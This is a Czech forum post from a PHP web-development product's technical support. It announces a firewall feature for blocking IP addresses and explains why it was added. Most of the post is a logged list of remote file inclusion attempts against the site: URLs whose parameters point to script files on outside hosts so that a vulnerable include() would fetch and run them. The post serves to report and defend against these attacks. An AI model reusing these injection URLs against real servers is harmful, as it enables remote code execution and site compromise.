Visual PHP™ - Visual web development environment for PHP - Visual PHP™ - Nové funkce a moduly

Obsah fora > Visual PHP™ > Nové funkce a moduly > Firewall

Firewall

od Master Developer (april 27, 2008 9:33:23 PM)

Při procházení statistik přístupů jsme narazili na zajímavé (nicméně nefunkční) pokusy o PHP injection, kdy se útočník snaží zneužít špatně nastaveného php.ini na serveru. Útok se provádí tak, že předpokládá volání include() souboru předaného v parametru. Podstrčením vlastního kódu dojde k napadení.

Visual PHP™ je vůči takovýmto útokům imunní, nicméně jsme se rozhodli naimplementovat vnitřní firewall, aby nedocházelo ke zkreslení statistik. Firewall si můžete sami nastavit na blokování IP adres. Před nastavením blokování IP doporučujeme kontrolu, zda IP neodpovídá některému z robotů vyhledávačů. Útočníci totiž využívají jednoduchý trik, kdy nespouští napadení přímo, ale umístí odkaz na stránky a tuto práci nechají provést návštěvníky nebo roboty.

Zde je výpis jednotlivých pokusů. Jak je vidět není to směrované přímo k útoku na náš produkt. Útočník to zkouší i na jiných doménách a zdá se že předpokládá, že naše stránky běží na některém jiném CMS systému (např útok na Joomla pomocí mosConfig_absolute_path)

http://www.visual-php.com//index.php?product=http://www.schmid-telecom.com/privz.txt????????????????????????
http://www.visual-php.com/?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg?
http://www.visual-php.com/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?
http://www.visual-php.com/?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy?
http://www.visual-php.com/cs/jak-system-funguje/system.php?System=http://www.lankawe.com/ioncube/readme.txt??
http://www.visual-php.com/documents.php?language=cs&mid=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/documents.php?language=cs&mid=http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://www.visual-php.com/documents.php?language=cs&mid=http://www.unduetretoccaate.it/codice/fog/iyi/
http://www.visual-php.com/documents.php?language=cs&mid=c4...f2-102b-bbd4-74b73c0566ef/kontakt.php?k=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/documents.php?language=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/documents.php?language=http://httpparty.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/documents.php?language=http://workersparty.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://yoshishome.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://httpparty.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/documents.php?mid=http://workersparty.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://yoshishome.chat.ru/images?
http://www.visual-php.com/en/product-sale-in-few-months//index.php?product=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/en/product-sale-in-few-months//index.php?product=http://www.schmid-telecom.com/privz.txt????????????????????????
http://www.visual-php.com/en/product-sale-in-few-months/index.php?prod=http://lineagezone.no-ip.org/je/sp/id.txt???
http://www.visual-php.com/en/product-sale-in-few-months/index.php?product=http://gukmin.or.kr/bbs/id.txt???
http://www.visual-php.com/en/product-sale-in-few-months/index.php?product=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/forms.php?language=cs&mid=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.filter-international.com/webservice/aro/medavuw/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.visual-php.com/forms.php?language=http://www.municipioxii.it/sunnyway/igodoq/bukosud/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/forms.php?language=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/forms.php?language=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/index.php?a=http://xxxxxx.xxxxx.xxx.gif?
http://www.visual-php.com/index.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/index.php?page=http://www.rlsusa.com/test.txt??
http://www.visual-php.com/index.php?prod=http://lineagezone.no-ip.org/je/sp/id.txt???
http://www.visual-php.com/index.php?product=http://gukmin.or.kr/bbs/id.txt???
http://www.visual-php.com/index.php?product=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/jak-system-funguje/system.php?System=http://www.lankawe.com/ioncube/readme.txt??
http://www.visual-php.com/kontakt-e-vision/kontakt.php?k=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/news.php?id=http://afterwedding.eclub.lv/images?
http://www.visual-php.com/news.php?id=http://httpparty.chat.ru/images?
http://www.visual-php.com/news.php?id=http://ironmanshome.chat.ru/images?
http://www.visual-php.com/news.php?id=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/news.php?id=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/news.php?id=http://workersparty.chat.ru/images?
http://www.visual-php.com/news.php?id=http://xishisniceplace.chat.ru/images?
http://www.visual-php.com/news.php?id=http://yoshishome.chat.ru/images?
http://www.visual-php.com/photogalleries.php?language=cs&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef&photogallery_items_page=1/*.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://203.71.212.3/www/modul/mic.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://gukmin.or.kr/bbs/id.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://kazehime.110mb.com/cmd/r6.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://n3bunel.ath.cx/safe.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://www.aeea1031.com/events/style.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://www.phanom.ac.th/msnlist/id.txt?
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://zodila.ilive.ro/sistem.txt?????
http://www.visual-php.com/photogalleries.php?language=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://www.municipioxii.it/sunnyway/igodoq/bukosud/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://www.winbd.net/admin/jist_code/wowoz/opaxi/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://203.71.212.3/www/modul/mic.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://gukmin.or.kr/bbs/id.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://kazehime.110mb.com/cmd/r6.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://n3bunel.ath.cx/safe.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://www.aeea1031.com/events/style.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://www.phanom.ac.th/msnlist/id.txt?
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://zodila.ilive.ro/sistem.txt?????
http://www.visual-php.com/photogalleries.php?mid=88622ce2-14f1-102b-bbd4-74b73c0566ef&photogallery_items_page=1/*.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.blumade.it/gestione/selops/dosa.txt??????????????????????????????
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.filter-international.com/webservice/aro/medavuw/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.stomol.ru/catalog/rivoz/vekudu/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/
http://www.visual-php.com/scripts.php?language=http://sans-packing.ru/img/jipeqap/ehudute/&tid=remote_install
http://www.visual-php.com/scripts.php?language=http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/&tid=remote_install
http://www.visual-php.com/scripts.php?language=http://www.unduetretoccaate.it/codice/fog/iyi/&tid=remote_install
http://www.visual-php.com/versions.php?id=http://visionswedding.chat.ru/images?
http://www.visual-php.com/versions.php?language=http://sans-packing.ru/img/jipeqap/ehudute/
http://www.visual-php.com/versions.php?language=http://www.northfans.ch/forum/admin/settings/ocoyo/azad/
http://www.visual-php.com/versions.php?language=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/video_tutorials.php?id=http://myloversplace.chat.ru/images?
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.elettrodataservice.it/foto_articoli/pivafof/oqonon/
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.filter-international.com/webservice/aro/medavuw/&styleName=fullscreen
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.northfans.ch/forum/admin/settings/ocoyo/azad/&styleName=fullscreen
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.unduetretoccaate.it/codice/fog/iyi/&styleName=fullscreen

Tato funkce je k nalezení v administraci v menu Nástroje->Firewall od verze 1.7.6.85

od: Master Developer (Technická podpora)

Pages: 1

* Tato technická podpora není jen otázkou klienta a odpovědí tvůrce software. Slouží i jako fórum mezi Vámi, našimi klienty samotnými. Nebojte se reagovat na příspěvek, když znáte odpovědi. Vyměňujte si zkušenosti s produktem Visual PHP™. Systém Visual PHP™ je jedinečný a lze v něm provádět jednu operaci více způsoby. Pochlubte se ostatním, pokud naleznete nový a jednodušší způsob, jak určitou součást řešit. Pomáháte tím sami sobě a zároveň se spolupodílíte na rozvoji celého systému.